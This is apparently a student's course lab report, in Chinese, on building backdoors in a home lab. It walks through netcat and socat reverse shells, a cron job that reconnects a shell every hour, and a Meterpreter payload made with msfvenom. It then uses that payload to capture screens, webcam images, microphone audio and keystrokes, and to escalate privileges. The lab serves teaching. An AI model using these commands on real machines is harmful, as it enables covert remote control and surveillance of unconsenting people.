20154309 【网络对抗技术】Exp2: 后门原理与实践

学习内容:

·使用nc实现win,mac,Linux间的后门连接

·meterpreter的应用

·MSF POST模板的应用

一、后门工具介绍

1.netcat(nc、ncat)

·是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使

用,起到后门作用。

2.socat

·类似于Netcat的加强版

3.Meterpreter

·利用Metaspolitmsfvenom指令生成后门可执行文件,本实验要生成这个后门程序就是Meterpreter

二、ncat、socat的基础操作

2.1 Windows与Linux间获取Shell

2.1.1 Windows主机获取 Linux Shell

Windows:

1.查询本机Ip地址:ipconfig

注意:在多个IP地址中,有两个是VMware的虚拟网卡产生的虚拟IP地址,
不用采用

由图得IPV4地址为:192.168.1.111

2.利用netcat.exe程序监听端口:4309

PS: cd查找路径

kali

3.使用nc 192.168.1.111 4309 -e反向连接Windows主机的4309端口

这张图忘截了...

4.Windows执行linux shell指令

2.1.2 Linux获取Win主机 Shell

Kali

1.查询虚拟机IP地址:ifconfig

IP地址为192.168.186.130

2.Linux系统打开监听端口nc -l -p 4309

3.Windows反弹连接Linux

要找准端口,不然会被积极拒绝...

4.Linux下看到Windows的命令提示

连接成功便可以在Linux下输入Windows指令,此时可以发现汉字为乱码。

2.2 ncat进行数据传输

1.Windows下监听窗口

2.Kali下连接到Windows的端口

3.建立连接后,即可以传输数据

结果图如图所示:

2.3 ncat定时启动

1.Windows输入指令ncat.exe -l -p 4309监听

2.在Kali环境下用 crontab -e 编辑定时任务
在最后一行添加 N * * * * /bin/netcat 172.168.3.2 5334 -e /bin/sh ,意思是在每个小时的第N分钟反向连接Windows主机的端口,就会启动cron。此处的我取N=21

3.当时间到指定分钟,就已经获得了Kali的shell:

2.4 socat定时启动

1.在Windows桌面按键win+I,依次打开 控制面板->系统和安全->管理工具->任务计划,新建一个任务

2.新建一个触发器

3.新建一个操作

4.确定,查看程序是否在运行,如未运行点击右侧运行按钮使其运行

5.Linux输入指令 socat - tcp:192.168.239.1:4305, windows主机IP、端口号,此时可以获取win的shell命令

三、体验 MSF Meterpreter 功能

3.1 利用msfvenom指令生成后门程序

1.在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154309_backdoor.exe ,此条指令意为生成一个.exe程序,名称为 20154309_backdoor,将来在windows上运行时会回连到Linux主机相应端口

![](

2.成功之后该文件在当前目录,找到之后拷贝到Windows主机,地址我设置在桌面上

3.2 Linux进入控制台进行设置

1.Linux输入指令msfconsole

2.在msf>下输入命令use exploit/multi/handler

3.继续输入set payload windows/meterpreter/reverse_tcp 设置payload

4.输入指令set LHOST Linux IP

5.输入指令 set LPORT 4305

6.输入指令show options

3.3 Linux打开监听,Windows运行后门

1.Linux输入指令exploit开始监听

2.win运行后门木马程序,可通过双击或者cmd执行

3.4 Linux主机操作Windows主机

1.输入指令screenshot 截取屏幕

2.输入指令 webcam_snap 拍摄照片


只有背光的()

3.输入指令record_mic 录制一段音频

4.输入指令keyscan_start记录击键内容,输入指令keyscan_dump 获取击键记录

5.输入指令getuid 查看当前用户,输入指令getsystem 提权

四、回答问题

1.例举你能想到的一个后门进入到你系统中的可能方式?

通过非正版网站下载软件绑定的非法软件或其他插件。

2.例举你知道的后门如何启动起来(win及linux)的方式?

打开监听端口,搜集靶机发出信号,连接即可启动后门。

3.Meterpreter有哪些给你映像深刻的功能?

能控制电脑的输入、输出端口设备。

4.如何发现自己有系统有没有被安装后门?

通过在AV软件或者网络平台进行电脑扫描。

五、实验感想

通过这次实验,切身地感受到了后门的威力,它能通过多种途径甚至很简单的方法潜入你的电脑,却能用多种手段影响到你的操作。真心地体会到在平时一定要增强
自己的安全意识。

posted on 2018-04-04 11:12  4309yanqing  阅读(183)  评论(0编辑  收藏

导航